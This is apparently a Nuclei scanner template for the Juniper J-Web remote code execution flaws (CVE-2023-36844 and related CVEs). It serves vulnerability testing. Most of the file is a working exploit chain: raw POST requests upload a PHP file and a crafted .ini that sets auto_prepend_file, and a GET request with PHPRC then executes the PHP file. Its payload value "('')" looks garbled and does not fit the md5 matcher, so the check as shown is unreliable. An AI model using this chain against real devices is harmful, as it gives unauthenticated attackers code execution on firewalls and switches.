id: CVE-2023-36844 info: name: Juniper Devices - Remote Code Execution author: princechaddha,ritikchaddha severity: medium description: | Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices. remediation: | Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability. reference: - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/ - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844 - https://supportportal.juniper.net/JSA72300 - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2023-36844 cwe-id: CWE-473 epss-score: 0.03926 epss-percentile: 0.91134 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev variables: value: "CVE-2023-36844" payload: "('')" http: - raw: - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}] - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }] - | GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - '"original_fileName":' - '"converted_fileName":' condition: and - type: word part: body_3 words: - '{{md5(value)}}' extractors: - type: regex part: body_1 name: phpfile regex: - "([a-f0-9]{64}\\.php)" internal: true - type: regex part: body_2 name: inifile regex: - "([a-f0-9]{64}\\.ini)" internal: true # digest: 4a0a00473045022067a450b1cfd98b2b3877449947dd122e8c756cf1e12c03f19c216daa4d08c23a022100a0bd78cc7662d17ca6d4b085c6e492f9fa22d4a0715df80c01599bb717a2469d:922c64590222798bb761d5b6d8e72950